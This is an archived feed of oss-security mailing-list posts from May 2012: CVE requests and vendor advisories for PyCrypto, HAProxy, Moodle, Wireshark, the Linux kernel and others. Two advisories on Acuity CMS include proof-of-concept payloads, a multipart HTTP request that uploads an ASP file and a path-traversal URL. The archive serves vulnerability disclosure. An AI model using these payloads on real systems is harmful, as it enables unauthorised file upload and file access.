http://blog.gmane.org/gmane.comp.security.oss.general hourly 1 1901-01-01T00:00+00:00 http://gmane.org/img/gmane-25t.png http://gmane.org http://comments.gmane.org/gmane.comp.security.oss.general/7763 <pre>Hi, Steve. Just a friendly heads-up on what came through CVENEW today: This should be rejected as per the message two responses after the first reference above: http://www.openwall.com/lists/oss-security/2011/08/10/2 where Eugene says, based on the "this isn't a security flaw" message from Dan Rosenberg. Can you add a "REJECT" or "DISPUTED" note or whatever? This probably should have never been written up. Thanks. </pre> Vincent Danen 2012-05-25T04:11:09 http://comments.gmane.org/gmane.comp.security.oss.general/7761 <pre>CVE-2012-2417 https://bugs.launchpad.net/pycrypto/+bug/985164 PyCrypto (also known as python-crypto) versions 2.5 and earlier implement incorrect ElGamal key generation. The bug has been fixed in PyCrypto 2.6, which was released this morning. Details below: In the ElGamal schemes (for both encryption and signatures), g is supposed to be the generator of the entire Z^*_p group. However, in PyCrypto 2.5 and earlier, g is more simply the generator of a random sub-group of Z^*_p. The result is that the signature space (when the key is used for signing) or the public key space (when the key is used for encryption) may be greatly reduced from its expected size of log(p) bits, possibly down to 1 bit (the worst case if the order of g is 2). While it has not been confirmed, it has also been suggested that an attacker might be able to use this fact to determine the private key. Anyone using ElGamal keys should generate new keys as soon as practical. Any additional information about this bug will be tracked at the above URL. </pre> Dwayne C. Litzenberger 2012-05-24T23:30:54 http://comments.gmane.org/gmane.comp.security.oss.general/7748 <pre>Powerdns does not drop/clear supplementary groups in its dropPrivs routine where the intent is to drop privileges. The relevant code can be found in pdns/unix_utility.cc / pdns-recursor-3.3/unix_utility.cc [0]. Can a CVE id be assigned for this issue? [0] pdns/unix_utility.cc / pdns-recursor-3.3/unix_utility.cc // Drops the program's privileges. void Utility::dropPrivs( int uid, int gid ) { if(gid) { if(setgid(gid)&lt;0) { theL()&lt;&lt;Logger::Critical&lt;&lt;"Unable to set effective group id to "&lt;&lt;gid&lt;&lt;": "&lt;&lt;stringerror()&lt;&lt;endl; exit(1); } else theL()&lt;&lt;Logger::Info&lt;&lt;"Set effective group id to "&lt;&lt;gid&lt;&lt;endl; } if(uid) { if(setuid(uid)&lt;0) { theL()&lt;&lt;Logger::Critical&lt;&lt;"Unable to set effective user id to "&lt;&lt;uid&lt;&lt;": "&lt;&lt;stringerror()&lt;&lt;endl; exit(1); } else theL()&lt;&lt;Logger::Info&lt;&lt;"Set effective user id to "&lt;&lt;uid&lt;&lt;endl; } } </pre> David Black 2012-05-24T16:20:59 http://comments.gmane.org/gmane.comp.security.oss.general/7740 <pre>Could a CVE be assigned to this flaw please? A flaw was reported in HAProxy where, due to a boundary error when copying data into the trash buffer, an external attacker could cause a buffer overflow. Exploiting this flaw could lead to the execution of arbitrary code, however it requires non-default settings for the global.tune.bufsize configuration option (must be set to a value greater than the default), and also that header rewriting is enabled (via, for example, the regrep or rsprep directives). This flaw is reported against 1.4.20, prior versions may also be affected. This has been fixed upstream in version 1.4.21 and in git. References: https://secunia.com/advisories/49261/ http://haproxy.1wt.eu/download/1.4/src/CHANGELOG http://haproxy.1wt.eu/git?p=haproxy-1.4.git;a=commit;h=30297cb17147a8d339eb160226bcc08c91d9530b https://bugzilla.redhat.com/show_bug.cgi?id=824542 </pre> Vincent Danen 2012-05-23T17:37:23 http://comments.gmane.org/gmane.comp.security.oss.general/7738 <pre>Hello Kurt, Steve, vendors, the following recent Wireshark upstream advisories: A) http://www.wireshark.org/security/wnpa-sec-2012-08.html References (upstream bugs and Red Hat bugzilla entry): [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6805 (802.11) [2] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7118 (802.3) [3] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7119 (ANSIMAP) [4] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7120 (ASF) [5] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7121 (BACAPP) [6] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7122 (HCIEVT) [7] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7124 (LTP) [8] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 (R3) [9] https://bugzilla.redhat.com/show_bug.cgi?id=824411 B) http://www.wireshark.org/security/wnpa-sec-2012-09.html References: [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7138 [2] https://bugzilla.redhat.com/show_bug.cgi?id=824413 C) http://www.wireshark.org/security/wnpa-sec-2012-10.html References: [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7221 [2] https://bugzilla.redhat.com/show_bug.cgi?id=824419 doesn't seem to have CVE identifiers yet. Could you allocate three of them? Thank you &amp;&amp; Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team </pre> Jan Lieskovsky 2012-05-23T12:38:47 http://comments.gmane.org/gmane.comp.security.oss.general/7737 <pre>Hello, Can I get a CVE identifier for this issue: http://www.codseq.it/advisories/multiple_vulnerabilities_in_loganalyzer Here is the changelog: http://loganalyzer.adiscon.com/news/loganalyzer-v3-4-3-v3-stable-released Thanks, Filippo Cavallarin C o d S e q Development with an eye on security ------------------------------------------------------------------------ Castello 2005, 30122 Venezia Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254 c.f. CVLFPP82B27L736J - p.iva 03737650279 http://www.codseq.it - filippo.cavallarin-4Iyl5xPYX6ReoWH0uzbU5w&lt; at &gt;public.gmane.org </pre> Filippo Cavallarin 2012-05-23T12:21:15 http://comments.gmane.org/gmane.comp.security.oss.general/7736 <pre>Hello, Can I get a CVE identifier for this issue: http://www.codseq.it/advisories/multiple_vulnerabilities_in_loganalyzer Here is the changelog http://loganalyzer.adiscon.com/news/loganalyzer-v3-4-3-v3-stable-released Thanks, Filippo Cavallarin C o d S e q Development with an eye on security ------------------------------------------------------------------------ Castello 2005, 30122 Venezia Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254 c.f. CVLFPP82B27L736J - p.iva 03737650279 http://www.codseq.it - filippo.cavallarin-4Iyl5xPYX6ReoWH0uzbU5w&lt; at &gt;public.gmane.org </pre> Filippo Cavallarin 2012-05-23T12:13:04 http://comments.gmane.org/gmane.comp.security.oss.general/7735 <pre>Description of problem: When called for anonymous (non-shared) mappings, hugetlb_reserve_pages() does a resv_map_alloc(). It depends on code in hugetlbfs's vm_ops-&gt;close() to release that allocation. However, in the mmap() failure path, we do a plain unmap_region() without the remove_vma() which actually calls vm_ops-&gt;close(). An unprivileged local user could use this flaw to crash the system. References: https://bugzilla.redhat.com/show_bug.cgi?id=824345 http://www.spinics.net/lists/linux-mm/msg34763.html Proposed upstream fix: https://lkml.org/lkml/2012/5/21/385 Thanks, </pre> Petr Matousek 2012-05-23T10:35:12 http://comments.gmane.org/gmane.comp.security.oss.general/7732 <pre>It was reported that it was possible to perform command injection through the cobbler xmlrpc api[0][1]. This issue was fixed in the git commit found at [2]. Can a CVE be assigned to this issue? [0] https://bugs.launchpad.net/ubuntu/+source/cobbler/+bug/978999 [1] https://github.com/cobbler/cobbler/issues/141 [2] https://github.com/cobbler/cobbler/commit/6d9167e5da44eca56bdf42b5776097a6779aaadf </pre> David Black 2012-05-23T08:39:10 http://comments.gmane.org/gmane.comp.security.oss.general/7731 <pre>Hi Kurt, Hi vendors, not too critical in my opinion, but I think still worth to be at least mentioned briefly as other distros such as Fedora 16 were affected too: https://bugzilla.novell.com/show_bug.cgi?id=740964 I'm not sure whether this issue should get a CVE, but in the past similar vulnerabilities got a CVE (e.g. CVE-2012-0863). Thanks, Matthias </pre> Matthias Weckbecker 2012-05-23T08:21:25 http://comments.gmane.org/gmane.comp.security.oss.general/7730 <pre>The following security notifications have now been made public. Thanks to OSS members for their cooperation. ======================================================================= MSA-12-0024: Hidden information access issue Topic: Data protection issue / Information disclosure by "Settings" -&gt; "Users" -&gt; "Enrolled users" Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Andreas Grupp Issue no.: MDL-31923 CVE Identifier: CVE-2012-2353 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-31923 Description: Teachers without appropriate permissions were able see user access information. ======================================================================= MSA-12-0025: Personal communication access issue Topic: "Recent conversations" allows anyone to see anyone else's messages Severity/Risk: Serious Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Juan Aburto Issue no.: MDL-31834 CVE Identifier: CVE-2012-2354 Changes (master): http://git.moodle.org/gw?p=moodle.git;a=commit;h=48e03792ca8faa2d781f9ef74606f3b3f0d3baec Description: By manipulating URL parameters, users were able to see others' messages. ======================================================================= MSA-12-0026: Quiz capability issue Topic: When you add a question to the quiz, it does not check the question:use... capability. Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Tim Hunt Issue no.: MDL-32240 CVE Identifier: CVE-2012-2355 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-32240 Description: Capabilities were not being correctly checked when adding questions to a quiz. ======================================================================= MSA-12-0027: Question bank capability issues Topic: Various problems with permissions checks in the question bank Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Tim Hunt Issue no.: MDL-32239 CVE Identifier: CVE-2012-2356 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-32239 Description: Capabilities were not being correctly checked when working in the question bank. Question authorship was not being checked. Users were shown UI elements when they did not have permission to use them. User permissions were not correctly checked when saving a question. ======================================================================= MSA-12-0028: Insecure authentication issue Topic: CAS Multi-Authentication Does Not Use HTTPS Login Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Chris Follin Workaround: Avoid CAS authentication Issue no.: MDL-32492 CVE Identifier: CVE-2012-2357 Changes (master): http://git.moodle.org/gw?p=moodle.git;a=commit;h=895e76ea51c462c18ad66e0761ad76cd26a63ecf Description: A page in the CAS Authentication process was using an insecure HTTP URL that, apart from being insecure, sent the user in circles. ======================================================================= MSA-12-0029: Information editing access issue Topic: Students can edit database entries in read only mode Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+ Reported by: Amanda Doughty Issue no.: MDL-31811 CVE Identifier: CVE-2012-2358 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-31811 Description: Students were able to edit pre-existing Database activity entries after the activity had entered a read-only period. ======================================================================= MSA-12-0030: Capability manipulation issue Topic: Non-editor teacher can exceed teacher permissions: example, backup:userinfo Severity/Risk: Serious Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+ Reported by: Jozas Nhial Issue no.: MDL-32030 CVE Identifier: CVE-2012-2359 Changes (master): http://git.moodle.org/gw?p=moodle.git;a=commit;h=0f75e1e6272db0303abc8e27362e5c3a1344b82f Description: Non-editing teachers were able to redefine their capabilities to achieve actions they would not normally be able to achieve. ======================================================================= MSA-12-0031: Cross-site scripting vulnerability in Wiki Topic: Injection and XSS vulnerability in wiki through insufficient validation Severity/Risk: Serious Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+, Reported by: Sam Hemelryk Issue no.: MDL-32018 CVE Identifier: CVE-2012-2360 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-32018 Description: It was possible to inject unfiltered HTML into a wiki page title. ======================================================================= MSA-12-0032: Cross-site scripting vulnerability in Web services Topic: XSS in /admin/webservice/service.php Severity/Risk: Serious Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+ Reported by: Dan Poltawski Workaround: Avoid Web services Issue no.: MDL-31694 CVE Identifier: CVE-2012-2361 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-31694 Description: The name parameter, sent to the Web service script service.php, was not being filtered correctly. ======================================================================= MSA-12-0033: Cross-site scripting vulnerability in Blog Topic: XSS bug in blog/index.php in IE Severity/Risk: Serious Versions affected: 1.9 to 1.9.17+ Reported by: Simon Coggins Issue no.: MDL-31745 CVE Identifier: CVE-2012-2362 Changes (1.9): http://git.moodle.org/gw?p=moodle.git;a=commit;h=038131c8b5614f18c14d964dc53b6960ae6c30d8 Description: Parameters sent to the Blog module were not sufficiently filtered. This allowed the potential for cross-site scripting in IE ======================================================================= MSA-12-0034: Potential SQL injection issue Topic: Stored SQL Injection in calendar Severity/Risk: Serious Versions affected: 1.9 to 1.9.17+ Reported by: Simon Coggins Issue no.: MDL-31746 CVE Identifier: CVE-2012-2363 Changes (1.9): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=refs%2Fheads%2FMOODLE_19_STABLE&amp;st=commit&amp;s=MDL-31746 Description: It was possible to include unfiltered information when adding a calendar event that was stored in the database. ======================================================================= MSA-12-0035: Cross-site scripting vulnerability in "download all" Topic: Content-Type is TEXT/HTML for zip Download instead of application/x-zip-compressed or forced download Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+ Reported by: Asaf Ohaion Workaround: Avoid "download all" feature in Assignment Issue no.: MDL-31558 CVE Identifier: CVE-2012-2364 Changes (master): http://git.moodle.org/gw?p=moodle.git;a=commit;h=ce4126c7a9e07dd0514f7ac297b5e60cad0b8d20 Description: An incorrect mimetype was being reported for zipped assignment submissions, causing some browsers to render the response. The fix for this issue also prevents incorrect use of file sending functions by third-party modules. ======================================================================= MSA-12-0036: Cross-site scripting vulnerability in category identifier Topic: XSS in /cohort/edit.php (POST parameter: idnumber) Severity/Risk: Serious Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+ Reported by: Dan Poltawski Issue no.: MDL-31691 CVE Identifier: CVE-2012-2365 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-31691 Description: The idnumber field, an arbitrary unique identifier for a category, was able to be entered without being filtered. ======================================================================= MSA-12-0037: Write access issue in Database activity module Topic: It's possible for any user to overwrite site wide database presets Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+ Reported by: Dan Poltawski Issue no.: MDL-31763 CVE Identifier: CVE-2012-2366 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-31763 Description: Users were able to overwrite site-wide Database activity presets created by other users. ======================================================================= MSA-12-0038: Calendar event write permission issue Topic: Calendar New Entry still shows and works for roles preventing calendar entry Severity/Risk: Minor Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+, 1.9 to 1.9.17+ Reported by: Martin Huntley Issue no.: MDL-18335 CVE Identifier: CVE-2012-2367 Changes (master): http://git.moodle.org/gw?p=moodle.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=MDL-18335 Description: Users without appropriate permissions were able to access the new calendar entry page and create a calendar entry. </pre> Michael de Raadt 2012-05-23T00:11:52 http://comments.gmane.org/gmane.comp.security.oss.general/7721 <pre>Hello Kurt, Steve, vendors, based on: [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871 [2] https://github.com/keithw/mosh/issues/271 A) Mosh issue: ============== A denial of service flaw was found in the way mosh, a remote terminal application, performed processing of parameters that have been passed to the terminal in the terminal dispatcher class (previously there was no limit for the count of parameters, which were allowed to be passed to the dispatcher). A remote atttacker could use this flaw to cause a denial of service (mosh server to enter long for loop when trying to process the paramaters) via specially-crafted escape sequence string. Upstream ticket: [3] https://github.com/keithw/mosh/issues/271 Relevant upstream patch: [4] https://github.com/keithw/mosh/commit/9791768705528e911bfca6c4d8aa88139035060e References: [5] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871 [6] https://bugzilla.redhat.com/show_bug.cgi?id=823943 Could you allocate a CVE id for this? (issue confirmed by mosh upstream) B) vte issue: ============= http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871#5 there is similar issue in vte too (Gnome bug private for now): https://bugzilla.gnome.org/show_bug.cgi?id=676090 Cc-ed Behdad Esfahbod on this post to clarify, what are the upstream plans regarding this report in vte and if the CVE id has been already assigned for it. Thank you &amp;&amp; Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team </pre> Jan Lieskovsky 2012-05-22T13:53:30 http://comments.gmane.org/gmane.comp.security.oss.general/7716 <pre>Upstream: http://blog.s9y.org/archives/241-Serendipity-1.6.2-released.html Advisory: https://www.htbridge.com/advisory/HTB23092 Upstream description of the issue: "The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code to a SQL query; since our DB layer does not execute multiple statements, and the involved SQL query is not used to produce output code, we regard the impact as low. Nevertheless, please upgrade your installation." Please assign CVE. </pre> Hanno Böck 2012-05-22T09:05:02 http://comments.gmane.org/gmane.comp.security.oss.general/7715 <pre>Hi, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3102 points to http://code.google.com/p/chromium/issues/detail?id=125462, which is a 404. http://googlechromereleases.blogspot.de/2012/05/stable-channel-update.html references Jueri Aedla for the credits. I suppose this is related to this libxml2 upstream commit: http://git.gnome.org/browse/libxml2/commit/?id=d8e1faeaa99c7a7c07af01c1c72de352eb590a3e Can anyone of the involved parties at Chrome and Red Hat please confirm? Cheers, Moritz </pre> Moritz Muehlenhoff 2012-05-21T20:22:42 http://comments.gmane.org/gmane.comp.security.oss.general/7713 <pre>Hi, spotted in xorls blog, who spotted it in the kernel stable changelog: https://xorl.wordpress.com/2012/05/17/linux-kernel-drm-intel-i915-multiple-ioctl-integer-overflows/ It has two issues: 1. overflow of cliprect kmalloc as args-&gt;num_cliprects is not bounded and passed in via a user ioctl. Fixed via ed8cd3b2cd61004cab85380c52b1817aca1ca49b in mainline: commit ed8cd3b2cd61004cab85380c52b1817aca1ca49b Author: Xi Wang &lt;xi.wang-Re5JQEeQqe8AvxtiuMwx3w&lt; at &gt;public.gmane.org&gt; Date: Mon Apr 23 04:06:41 2012 -0400 drm/i915: fix integer overflow in i915_gem_execbuffer2() On 32-bit systems, a large args-&gt;buffer_count from userspace via ioctl may overflow the allocation size, leading to out-of-bounds access. This vulnerability was introduced in commit 8408c282 ("drm/i915: First try a normal large kmalloc for the temporary exec buffers"). 8408c282 was added Feb 21 2011, and seemingly added during 2.6.38 development. 2. same file, overflow in args-&gt;buffer_count. Fix is in mainline 44afb3a04391a74309d16180d1e4f8386fdfa745 commit 44afb3a04391a74309d16180d1e4f8386fdfa745 Author: Xi Wang &lt;xi.wang-Re5JQEeQqe8AvxtiuMwx3w&lt; at &gt;public.gmane.org&gt; Date: Mon Apr 23 04:06:42 2012 -0400 drm/i915: fix integer overflow in i915_gem_do_execbuffer() On 32-bit systems, a large args-&gt;num_cliprects from userspace via ioctl may overflow the allocation size, leading to out-of-bounds access. This vulnerability was introduced in commit 432e58ed ("drm/i915: Avoid allocation for execbuffer object list"). 432e58ed was added during 2.6.37 development. I think it needs 2 CVEs, due to the different kernel versions introducing it. Ciao, Marcus </pre> Marcus Meissner 2012-05-21T06:38:31 http://comments.gmane.org/gmane.comp.security.oss.general/7712 <pre>Hi, Can anyone assing a CVE id for the following PHP's phar extension integer overflow vulnerability? (Secunia SA44335) Private report: https://bugs.php.net/bug.php?id=61065 Discovered by: Alexander Gavrun Original Advisory: http://0x1byte.blogspot.com/2011/04/php-phar-extension-heap-overflow.html </pre> Felipe Pena 2012-05-20T18:09:06 http://comments.gmane.org/gmane.comp.security.oss.general/7711 <pre>1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp , not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="path" /images -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootpath" / -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootdisplay" http://localhost/ -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="status" confirmed -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="action" fileUpload -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="file1"; filename="0wned.asp" Content-Type: application/octet-stream &lt;% response.write("0wned!") %&gt; -----------------------------6dc3a236402e2-- [/REQUEST] 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload #yehg [2012-05-20] </pre> YGN Ethical Hacker Group 2012-05-20T09:48:55 http://comments.gmane.org/gmane.comp.security.oss.general/7710 <pre>1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is due to the script, /admin/file_manager/browse.asp, not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the 'path' parameter. It would allow the attacker to access arbitrary files outside of web root directory. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/admin/file_manager/browse.asp?field=&amp;form=&amp;path=../../ 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal #yehg [2012-05-20] </pre> YGN Ethical Hacker Group 2012-05-20T09:47:35 http://comments.gmane.org/gmane.comp.security.oss.general/7708 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Original sources: https://isc.sans.edu/diary/PHP+5+4+Remote+Exploit+PoC+in+the+wild/13255 http://packetstormsecurity.org/files/112851/php54-exec.txt http://www.exploit-db.com/exploits/18861/ http://www.reddit.com/r/netsec/comments/tuyp3/isc_diary_php_54_remote_exploit_poc_in_the_wild/ - From the exploit: // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) There appears to be a buffer overflow in com_print_typeinfo(), it appears to only affect PHP on Windows (COM object related). - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPuHGyAAoJEBYNRVNeJnmTzdsP/3whmwu6ImrekHLWJQ/lsms7 ZRyIlkawEmTD6VO1PqJ/IN+a4Gid168ARsQV0KOsKJ9dd9cdcGBIRQ3qT1ENfplG MnL9B89Z75l7Zk28exVXCJcKvCczN83g/tMVUBceGH2hk8bQYbcykYeUTBiXVCsa JA9E8wPMmNQjRHvkbKL1Ec3uMLJuZAAx8OIqSi87PXalVtOyfR+EXFJnGo8VemID tyhb7UOk7toUJFG77pIal0LkXbE6P9JTjibzLtmvMMrmwXzrRlxA4XBqCeHIpbk5 Dc+ukBDYK/BqhXl3OoetbYXglrSV2HjRKAQSpiZe/3iTm41foiDRjc4YBZFgKXf8 DY5P3/022VHVXKou88+QFZjr1yGRqlncheZL44cZzvoWCPAR6XjDAlzJP4Gh2FGn E6hHoa1Sy70k06nKxUPx7KEzZ+KoUAF1pqsw9mzE6Dv4k4BsREGaceDXpwu8loaY jzaI28SQtVMFsVB1Lgpd2jt4U2ZLbtbsmlyHNw2EYwJrWE+/Rq4zD0VLzq4OMArv brkQ/xQCZG+feNVnpXrqv4zKCgYBKZWgQqZxSpEJHmRzhSzXvIh/FOxkbp6Lf+Sh +1Z6puxEOHlEO20I5D4DD//r+8YqIb0zerKClsKAQj7Q54LYOAC62g6AbePW95S5 3gBx2LxCAFlwMwrUB2zm =aBYa -----END PGP SIGNATURE----- </pre> Kurt Seifried 2012-05-20T04:23:14 http://comments.gmane.org/gmane.comp.security.oss.general/7704 <pre>Hi, It has been disclosed [0] that the debian vote engine (devotee) [1] uses cryptographically weak pseudo-random numbers (intended to be 48-bit, but really only 32-bit due to the use of a 32-bit seed feeding the 48-bit number generator) to generate ballot secret monikers. This allows unprivileged persons to brute force the contents of presumably secret election ballots, and makes it possible to calculate the contents of secret voter ballots in all past debian elections. Ideally, devotee should use a random secret moniker with fully 64 (or preferably 128) bits that would require years rather than minutes or days to brute force [2]. The source also uses /dev/urandom, which has less entropy than /dev/random. Please assign an id for this issue. Thanks, Mike [0] https://lists.debian.org/debian-devel/2012/04/msg00528.html [1] http://anonscm.debian.org/gitweb/?p=users/srivasta/debian/devotee.git [2] http://www.codinghorror.com/blog/2006/07/brute-force-key-attacks-are-for-dummies.html </pre> Michael Gilbert 2012-05-18T21:48:22 http://comments.gmane.org/gmane.comp.security.oss.general/7703 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 https://github.com/s9y/Serendipity/commit/87153991d06bc18fe4af05f97810487c4a340a92 http://blog.s9y.org/archives/241-Serendipity-1.6.2-released.html CVE-2012-2762 (different affected versions than CVE-2012-2332) - -- CVE assignment team, MITRE CVE Numbering Authority M/S S145 202 Burlington Road, Bedford, MA 01730 USA [ PGP key available through http://cve.mitre.org/cve/obtain_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (SunOS) iQEcBAEBAgAGBQJPtrB3AAoJEGvefgSNfHMd840H/i+ReLRXmlQRN4sqkhzEqkj5 bgJfdSd2l9eU50wCdZtqOeV2Os8mLpDeO1KR4IFIQNcXGVJsh4z3wbTHF4WkNHaF 8CqrzReerujVmhSABl2U4mz7m1/KoQCBdzKcF1dGbFMlUSGuUZpYi8+mFvHFieig 54zhO5kiQJyAJJMb8xjcxkmvhxC2OD2rTULmw+zqswRGVVKpOPIxiB6m8d9zYLnD JFT31MtfNLmT9YwvTYctaU/Q9y2kP6yRdmYyPB0tojhXfURNCd5O5XRpf3L2Fqx3 p01iJBap3unzTEcN9MnkK03vm0cvzpNRycbqfaPcoyf0e7TP6Vv44qFJ83NX1HE= =6lp5 -----END PGP SIGNATURE----- </pre> cve-assign-AZamIotjMK3YtjvyW6yDsg< at >public.gmane.org 2012-05-18T20:28:36 Search the mailing list at Gmane query http://search.gmane.org/?group=$group=gmane.comp.security.oss.general